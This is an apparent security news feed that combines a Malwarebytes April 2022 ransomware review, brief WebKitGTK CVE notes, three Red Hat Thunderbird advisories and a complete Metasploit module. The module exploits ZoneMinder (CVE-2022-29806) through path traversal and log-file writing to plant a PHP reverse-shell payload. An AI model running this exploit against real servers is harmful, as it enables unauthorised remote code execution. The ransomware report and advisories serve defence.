April 2022 saw the arrival of three new ransomware gangs and the unwelcome return of an old enemy.
The post Ransomware: April 2022 review appeared first on Malwarebytes Labs.

The Malwarebytes Threat Intelligence team monitors the threat landscape continuously and produces monthly ransomware reports based on a mixture of proprietary and open-source intelligence.

April 2022 was most notable for the emergence of three new ransomware-as-a-service (RaaS) groups—**Onyx**, **Mindware**, and **Black Basta**—as well as the unwelcome return of **REvil**, one of the world’s most notorious and dangerous ransomware operations.

**An old enemy returns**

**REvil** (aka Sodinokibi) first appeared in May 2020 and has been responsible for numerous high-profile ransomware attacks, including arguably the biggest ransomware attack of all time—a supply-chain attack on Kaseya VSA in July 2021 that is thought to have affected over 1,000 businesses.

REvil disappeared shortly after the Kaseya attack, only to emerge again a few months later, before being forced offline on October 21, 2021, by a multi-country operation. A string of arrests followed, and then in January—in an act of unprecedented co-operation—Russia’s Federal Security Service (FSB) announced that it had dismantled the REvil group and charged its members, thanks to information provided by the USA.

REvil now seems to have returned to the fray with new payloads, and a new leak blog displaying a mixture of new victims and old victims known to have been attacked by REvil.

**New gangs emerge**

**Black Basta** made a name for itself very quickly by coming out of nowhere and carrying out at least eleven successful breaches in April 2022. That ability to perform so many attacks so quickly has led some to speculate that Black Basta is a re-brand of an existing group that already has affiliates.

**Onyx** is a new ransomware gang based on the old Chaos builder. At first, some suspected that Onyx may be a wiper rather than ransomware because it destroyed files larger than 2MB instead of encrypting them. It seems likely that this behavior is the result of a bug in the notoriously poorly-written ransomware builder though.

Another newly-emerged gang is **Mindware**, which appears to have started operations in mid-March using a well-known ransomware strain called SFile2 (aka Escal)—but it was not until April that it began to practice “double extortion”, where data is stolen before it’s encrypted so that victims are faced with the twin threats of data they can’t decrypt, and leaks of sensitive information.

****Ransomware attacks in April 2022****

Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their Dark Web leak sites. This information represents victims who were successfully attacked but opted not to pay a ransom.

****Attacks by ransomware type****

Despite its rapid start, the activities of Black Basta and the other newly-emerged types of ransomware were dwarfed in April by three established threats: LockBit, Conti, and AlphV, which made up 60 percent of all the known breaches in our analysis.

Known ransomware attacks in April 2022 by type of ransomware

Known ransomware attacks in April 2022 by country

Known ransomware attacks in April 2022 by industry

****Ransomware mitigations****

Source: IC3.gov

*   Implement regular backups of all data to be stored as air-gapped, password-protected copies offline. Ensure these copies are not accessible for modification or deletion from any system where the original data resides.
*   Implement network segmentation, such that all machines on your network are not accessible from every other machine.
*   Install and regularly update antivirus software on all hosts, and enable real-time detection.
*   Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
*   Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
*   Audit user accounts with administrative privileges and configures access controls with the least privilege in mind. Do not give all users administrative privileges.
*   Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs for any unusual activity.
*   Consider adding an email banner to emails received from outside your organization.
*   Disable hyperlinks in received emails.
*   Use double authentication when logging into accounts or services.
*   Ensure routine auditing is conducted for all accounts.
*   Ensure all the identified IOCs are input into the network SIEM for continuous monitoring and alerts.

****How Malwarebytes protects against ransomware****

Malwarebytes can protect systems against all ransomware variants in several ways.

The Malwarebytes Anti-Malware technology detects malicious files, browser modifications, and system modifications on Windows PCs using a combination of signature-based and signatureless technologies. This layer of protection detects the Ransomware binary itself. Detections can happen in real-time as the binary is run or the infection can be rooted out from an already-compromised machine by conducting a full system scan.

Anti-Ransomware is a signatureless technology in charge of monitoring system activity of processes against a certain subset of data in specific locations on the endpoint. Using patented technology, Anti-Ransomware assesses changes in those data files. If an internal scoring threshold is crossed by a monitored process, it triggers a detection from the Anti-Ransomware component.

For those already infected, Ransomware Rollback can help recover encrypted files within 72 hours of the attack. Rollback creates a local cache on the endpoint to store changes to files on the system. It can use this cache to help revert changes caused by a threat. The rollback feature is dependent on activity monitoring available in Malwarebytes Endpoint Detection and Response.

Ransomware: April 2022 review

In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.

CVE-2022-30293: security_advisories/webkitgtk-2.36.0 at master · ChijinZ/security_advisories

In WebKitGTK through 2.36.0 (and WPE WebKit), there is a use-after-free in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.

**Related documentation**

*   Creating an account

You are not authorized to access bug #237188. To see this bug, you must first log in to an account with the appropriate permissions.

Please press **Back** and try again.

CVE-2022-30294: Bug Access Denied

This Metasploit module exploits an arbitrary file write in the debug log file option chained with a path traversal in the language settings that leads to remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ZoneMinder Language Settings Remote Code Execution',        'Description' => %q{          This module exploits arbitrary file write in debug log file option          chained with a path traversal in language settings that leads to a          remote code execution in ZoneMinder surveillance software versions          before 1.36.13 and before 1.37.11        },        'License' => MSF_LICENSE,        'Author' => [ 'krastanoel' ], # Discovery and exploit        'References' => [          [ 'CVE', '2022-29806' ],          [ 'URL', 'https://krastanoel.com/cve/2022-29806']        ],        'Platform' => ['php'],        'Privileged' => false,        'Arch' => ARCH_PHP,        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2022-04-27',        'DefaultTarget' => 0,        'DefaultOptions' => {          'Payload' => 'php/reverse_perl',          'Encoder' => 'php/base64'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),      OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])    ])  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET'    )    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200    if res.body =~ /ZoneMinder/      csrf_magic = get_csrf_magic(res)      res = authenticate(csrf_magic) if res.body =~ /ZoneMinder Login/      return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, '/index.php'),        'method' => 'GET',        'keep_cookies' => true      )    else      return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')    end    res.body.match(/v(1.\d+.\d+)/)    version = Regexp.last_match(1)    unless version      return Exploit::CheckCode::Safe('Unable to determine ZoneMinder version')    end    version = Rex::Version.new(version)    return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')    Exploit::CheckCode::Safe("Version Detected: #{version}")  rescue ::Rex::ConnectionError    return Exploit::CheckCode::Unknown('Could not connect to the web service')  end  def exploit    unless datastore['AutoCheck']      cookie_jar.clear      res = authenticate      fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>}    end    vprint_status('Leak installation directory path')    random_path = rand_text_alphanumeric(6..15)    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' => { 'view' => random_path }    )    fail_with(Failure::UnexpectedReply, 'Failed to leak install path') unless res    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' => { 'view' => 'options' }    )    csrf_magic = get_csrf_magic(res)    current_lang = res&.get_html_document&.at(      'select[@name="newConfig[ZM_LANG_DEFAULT]"]        option[@selected="selected"]'    )&.text    fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil? || current_lang.nil?    data = 'view=request&request=log&task=query&limit=10'    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank?    res.body.match(/(\{"result":.*})/)    request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access    if request_log.key?(:rows) # Check for latest version key first v1.36.x      request_log_key = 'rows'    elsif request_log.key?(:logs)      request_log_key = 'logs'    else      fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')    end    request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first    if request_log      path = request_log['File'].split('/')[0..-2].join('/')      vprint_good("Path: #{path}")    else      fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')    end    fname = "#{rand_text_alphanumeric(6..15)}.php"    traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join    shell = "#{traverse_path}tmp/#{fname}"    data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to set LOG_DEBUG_FILE option') if res.nil? || res&.code != 302    vprint_good("Shell: #{shell}")    p = %(<?php #{payload.encoded} ?>)    data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to receive a response') unless res    result = JSON.parse(res.body)['result']    fail_with(Failure::UnexpectedReply, 'Failed to write payload') unless result    fail_with(Failure::UnexpectedReply, 'Unable to write payload to LOG_DEBUG_FILE') if result != 'Ok'    # trigger the shell    lang = shell.gsub(/\.php/, '')    data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to trigger the payload') if res.nil? || res&.code != 302    # cleanup    data = Rack::Utils.parse_nested_query(data)    data['newConfig']['ZM_LANG_DEFAULT'] = current_lang    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_query,      'keep_cookies' => true    )    vprint_warning('Unable to reset language to default') if res.nil? || res&.code != 200    data['tab'] = 'logging'    data['newConfig']['ZM_LOG_DEBUG'] = 0    data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_query,      'keep_cookies' => true    )    vprint_warning('Unable to reset debug option') if res.nil? || res&.code != 302  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  end  private  def get_csrf_magic(res)    return if res.nil?    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text  end  def authenticate(csrf_magic = nil)    username = datastore['USERNAME']    password = datastore['PASSWORD']    data = "action=login&view=login&username=#{username}&password=#{password}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    })  endend

ZoneMinder Language Settings Remote Code Execution

Red Hat Security Advisory 2022-1730-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.9.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:1730-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1730  
Issue date:        2022-05-05  
CVE Names:         CVE-2022-1520 CVE-2022-29909 CVE-2022-29911  
                   CVE-2022-29912 CVE-2022-29913 CVE-2022-29914  
                   CVE-2022-29916 CVE-2022-29917  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.9.0.

Security Fix(es):

* Mozilla: Bypassing permission prompt in nested browsing contexts  
(CVE-2022-29909)

* Mozilla: iframe Sandbox bypass (CVE-2022-29911)

* Mozilla: Fullscreen notification bypass using popups (CVE-2022-29914)

* Mozilla: Leaking browser history with CSS variables (CVE-2022-29916)

* Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
(CVE-2022-29917)

* Mozilla: Reader mode bypassed SameSite cookies (CVE-2022-29912)

* Mozilla: Speech Synthesis feature not properly disabled (CVE-2022-29913)

* Mozilla: Incorrect security status shown after viewing an attached email  
(CVE-2022-1520)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081468 - CVE-2022-29914 Mozilla: Fullscreen notification bypass using popups  
2081469 - CVE-2022-29909 Mozilla: Bypassing permission prompt in nested browsing contexts  
2081470 - CVE-2022-29916 Mozilla: Leaking browser history with CSS variables  
2081471 - CVE-2022-29911 Mozilla: iframe Sandbox bypass  
2081472 - CVE-2022-29912 Mozilla: Reader mode bypassed SameSite cookies  
2081473 - CVE-2022-29917 Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
2082037 - CVE-2022-1520 Mozilla: Incorrect security status shown after viewing an attached email  
2082038 - CVE-2022-29913 Mozilla: Speech Synthesis feature not properly disabled

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-91.9.0-3.el8_5.src.rpm

aarch64:  
thunderbird-91.9.0-3.el8_5.aarch64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_5.aarch64.rpm  
thunderbird-debugsource-91.9.0-3.el8_5.aarch64.rpm

ppc64le:  
thunderbird-91.9.0-3.el8_5.ppc64le.rpm  
thunderbird-debuginfo-91.9.0-3.el8_5.ppc64le.rpm  
thunderbird-debugsource-91.9.0-3.el8_5.ppc64le.rpm

s390x:  
thunderbird-91.9.0-3.el8_5.s390x.rpm  
thunderbird-debuginfo-91.9.0-3.el8_5.s390x.rpm  
thunderbird-debugsource-91.9.0-3.el8_5.s390x.rpm

x86_64:  
thunderbird-91.9.0-3.el8_5.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_5.x86_64.rpm  
thunderbird-debugsource-91.9.0-3.el8_5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1520  
https://access.redhat.com/security/cve/CVE-2022-29909  
https://access.redhat.com/security/cve/CVE-2022-29911  
https://access.redhat.com/security/cve/CVE-2022-29912  
https://access.redhat.com/security/cve/CVE-2022-29913  
https://access.redhat.com/security/cve/CVE-2022-29914  
https://access.redhat.com/security/cve/CVE-2022-29916  
https://access.redhat.com/security/cve/CVE-2022-29917  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnQGstzjgjWX9erEAQjF4A//SunGEsCU1BiBRB3SU+W4qGeXzRz3NmNs  
sX55sJaXtYJ7efOg7kK8989v3VevTQCGDvwfuw48tQmlzCVz35zWTPhLeqjuiAn7  
DvHdez+4ci/ZRX9Argb1c2i9zU5bAon1PyRGEmP6uGcZztX2BYyo6Dkcg+Ow1D7g  
fa234gve8Q9pyKYvH4yN8DNOcNq8lm7B8a6vXr8+r/XFPWqBjGet0cH4N9wCRYDm  
VBrV692/8c3vW9u80EJbatpeaqEaYa1NteB7XDxERYCA+BoLal2v1wv7FN/nz0JJ  
9as8JmSDZRGu5S0aZlJIgNVSvxLDroBkfTcMjqJDqePpjf9ecF+XvXBgjtpyqVus  
bfbRpfRJArussaji8I+X6u2MvNoGtIyisjxz+rvhZ7V2Os6NWhAu7PFdUTcOop1J  
/WGL/3t4vK+YKwp3uDZwLZavU0DlGiBqhxtjlJV2/c+LZuSp1nxH0VxXrjAeUdQP  
zap+HhcCa6nEMkjnwW6DJfa1mTfbVvm0OhK7GnstA4s0z6nz+fbydz3eFxPY5WEs  
DHK6brQxWS37BdLOSzGjSrvuOWowq8eVsV6fCxp/VeUJJDH1XXOiD0g9kSndErTg  
iMgTimFBG0P0vRrMgO5MKztsuHIxWFGNfSWnNTErNdu8DlbudyQ5HaGY/owKQM0T  
Cg/vkuyfREA=KyQn  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1730-01

Red Hat Security Advisory 2022-1726-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.9.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:1726-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1726  
Issue date:        2022-05-05  
CVE Names:         CVE-2022-1520 CVE-2022-29909 CVE-2022-29911  
                   CVE-2022-29912 CVE-2022-29913 CVE-2022-29914  
                   CVE-2022-29916 CVE-2022-29917  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.9.0.

Security Fix(es):

* Mozilla: Bypassing permission prompt in nested browsing contexts  
(CVE-2022-29909)

* Mozilla: iframe Sandbox bypass (CVE-2022-29911)

* Mozilla: Fullscreen notification bypass using popups (CVE-2022-29914)

* Mozilla: Leaking browser history with CSS variables (CVE-2022-29916)

* Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
(CVE-2022-29917)

* Mozilla: Reader mode bypassed SameSite cookies (CVE-2022-29912)

* Mozilla: Speech Synthesis feature not properly disabled (CVE-2022-29913)

* Mozilla: Incorrect security status shown after viewing an attached email  
(CVE-2022-1520)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081468 - CVE-2022-29914 Mozilla: Fullscreen notification bypass using popups  
2081469 - CVE-2022-29909 Mozilla: Bypassing permission prompt in nested browsing contexts  
2081470 - CVE-2022-29916 Mozilla: Leaking browser history with CSS variables  
2081471 - CVE-2022-29911 Mozilla: iframe Sandbox bypass  
2081472 - CVE-2022-29912 Mozilla: Reader mode bypassed SameSite cookies  
2081473 - CVE-2022-29917 Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
2082037 - CVE-2022-1520 Mozilla: Incorrect security status shown after viewing an attached email  
2082038 - CVE-2022-29913 Mozilla: Speech Synthesis feature not properly disabled

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
thunderbird-91.9.0-3.el8_4.src.rpm

aarch64:  
thunderbird-91.9.0-3.el8_4.aarch64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_4.aarch64.rpm  
thunderbird-debugsource-91.9.0-3.el8_4.aarch64.rpm

ppc64le:  
thunderbird-91.9.0-3.el8_4.ppc64le.rpm  
thunderbird-debuginfo-91.9.0-3.el8_4.ppc64le.rpm  
thunderbird-debugsource-91.9.0-3.el8_4.ppc64le.rpm

s390x:  
thunderbird-91.9.0-3.el8_4.s390x.rpm  
thunderbird-debuginfo-91.9.0-3.el8_4.s390x.rpm  
thunderbird-debugsource-91.9.0-3.el8_4.s390x.rpm

x86_64:  
thunderbird-91.9.0-3.el8_4.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_4.x86_64.rpm  
thunderbird-debugsource-91.9.0-3.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1520  
https://access.redhat.com/security/cve/CVE-2022-29909  
https://access.redhat.com/security/cve/CVE-2022-29911  
https://access.redhat.com/security/cve/CVE-2022-29912  
https://access.redhat.com/security/cve/CVE-2022-29913  
https://access.redhat.com/security/cve/CVE-2022-29914  
https://access.redhat.com/security/cve/CVE-2022-29916  
https://access.redhat.com/security/cve/CVE-2022-29917  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnQGxtzjgjWX9erEAQhAoA/+Il0KSJzRzn19uKI7t5uynpXJbyNali6Q  
/oOq27+JD2wOFJVIHhzns3zf+M4EtbncZGmn+KLgv/GeoTJYwp56yaZzB6Va+TC3  
cZ75fQRmZ23WEyXUW7ovxAP1zsAASEck8tm4Op6NIi/yVNZvn61WIQSOBuRSfZZV  
br79+22s9sEM9vCAlYc6d1OXdyvAC/4qBtvkSaixo0DeBs2khyvXa6OjhThYk4JX  
UvXKNVP/KFFApTkZCQh58pMLoExbQiVBpSTlXekyEzA97qXs5egUfxTc3DY1lTB/  
RxmPFLBD1KyXQ71umQWJDSOoBMpIKmuJd9O03fZFR5Yn3OGwpdk300O39HKkb3Ph  
4wq+Cab60poUxSwn+8yKPqL9Ia1z5nOaiRx29tZjQinWJr3wg5xIRpVpSpp5Iw0u  
deX86ZFgfCPb1C9kjzSdmIuRA22oIG7aB6Dwg0DRUxo/ZgB9Bao01ShDz5O38qfi  
bcw12NBlslc/JCwBYTsq6cRGCfJPOI1D6sUjqVUveCMrJWciQ6u1UtMd6mQadd+I  
KOJVDwbceaMScllqf+UukXZk63T9EzWIut8ce9uuvenELlNqPEJ9Fl35Q8LYtjYf  
nuMrnCOjS6rQIWbeEIlAl6llMOdclzOEMAuoqTWZe55gvctECxAbbDvklsokph83  
tCwNRqx20JY=L5Iv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1726-01

Red Hat Security Advisory 2022-1727-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.9.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:1727-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1727  
Issue date:        2022-05-05  
CVE Names:         CVE-2022-1520 CVE-2022-29909 CVE-2022-29911  
                   CVE-2022-29912 CVE-2022-29913 CVE-2022-29914  
                   CVE-2022-29916 CVE-2022-29917  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.9.0.

Security Fix(es):

* Mozilla: Bypassing permission prompt in nested browsing contexts  
(CVE-2022-29909)

* Mozilla: iframe Sandbox bypass (CVE-2022-29911)

* Mozilla: Fullscreen notification bypass using popups (CVE-2022-29914)

* Mozilla: Leaking browser history with CSS variables (CVE-2022-29916)

* Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
(CVE-2022-29917)

* Mozilla: Reader mode bypassed SameSite cookies (CVE-2022-29912)

* Mozilla: Speech Synthesis feature not properly disabled (CVE-2022-29913)

* Mozilla: Incorrect security status shown after viewing an attached email  
(CVE-2022-1520)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081468 - CVE-2022-29914 Mozilla: Fullscreen notification bypass using popups  
2081469 - CVE-2022-29909 Mozilla: Bypassing permission prompt in nested browsing contexts  
2081470 - CVE-2022-29916 Mozilla: Leaking browser history with CSS variables  
2081471 - CVE-2022-29911 Mozilla: iframe Sandbox bypass  
2081472 - CVE-2022-29912 Mozilla: Reader mode bypassed SameSite cookies  
2081473 - CVE-2022-29917 Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
2082037 - CVE-2022-1520 Mozilla: Incorrect security status shown after viewing an attached email  
2082038 - CVE-2022-29913 Mozilla: Speech Synthesis feature not properly disabled

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-91.9.0-3.el8_1.src.rpm

ppc64le:  
thunderbird-91.9.0-3.el8_1.ppc64le.rpm  
thunderbird-debuginfo-91.9.0-3.el8_1.ppc64le.rpm  
thunderbird-debugsource-91.9.0-3.el8_1.ppc64le.rpm

x86_64:  
thunderbird-91.9.0-3.el8_1.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_1.x86_64.rpm  
thunderbird-debugsource-91.9.0-3.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1520  
https://access.redhat.com/security/cve/CVE-2022-29909  
https://access.redhat.com/security/cve/CVE-2022-29911  
https://access.redhat.com/security/cve/CVE-2022-29912  
https://access.redhat.com/security/cve/CVE-2022-29913  
https://access.redhat.com/security/cve/CVE-2022-29914  
https://access.redhat.com/security/cve/CVE-2022-29916  
https://access.redhat.com/security/cve/CVE-2022-29917  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnQGu9zjgjWX9erEAQjPRhAAkF0CeuNcQAtADPGCreU6c6YnnRPL7Ijx  
+r1FTuEsmswKGfMSie/x797yAj07RIrwdE221/U+qBANlsot2Cl8WBaansZb4+ZP  
9LC+dQSCrttSHQ8lrxXVRqCXIKWsTkbyDW+WXYT2aqchOsxbU46kFX6wUOc0hiUM  
6BL3L8W5DvIColxlmNVYgSEiOCNfW6WHPWuOCKTffZc1abVKjVSEI0rW2yutJFHj  
9DYPHfIpfarDsMJ5zJfU6gvVBv9mLfJGK0TQV/ezFOHRYhTnoR0HGkC/M77JKZ/m  
tJQiYA9zFRW734fbBQXpe58amHmPmI9KQHjJFwZA8YWaq2MIoarAXVJxBNqS7Hoy  
k+sAALnVPbJa7Jl8tU+VD1x7s66G8DLmvD5uMEEVzvFLqj63ILxGJKgIjDSs/sZO  
+XTAzupUwoOOpepRAwDHYofjk+dCu4tsXO6J8F145Xj9mq8Pncds8sXMUZd3usBl  
TquQtfbpV646JCVLGawdTDd69Eih7Rboxox5s7qsdblZ1sgA/SnMQ821VByJ2aNj  
uxpD+EmjScDFAAEE44ureRNLsDdeDQ4TELA4FUgSfxNx1JdQ1BSnFIPo+TCJXtD9  
V96gBqxYM9C4ZAEfNuM1NskBjBxppZSoy3MZwcnJLDDk8CD792IavpDizo1kUuLq  
kmdfEiJTnKUú+A  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1727-01

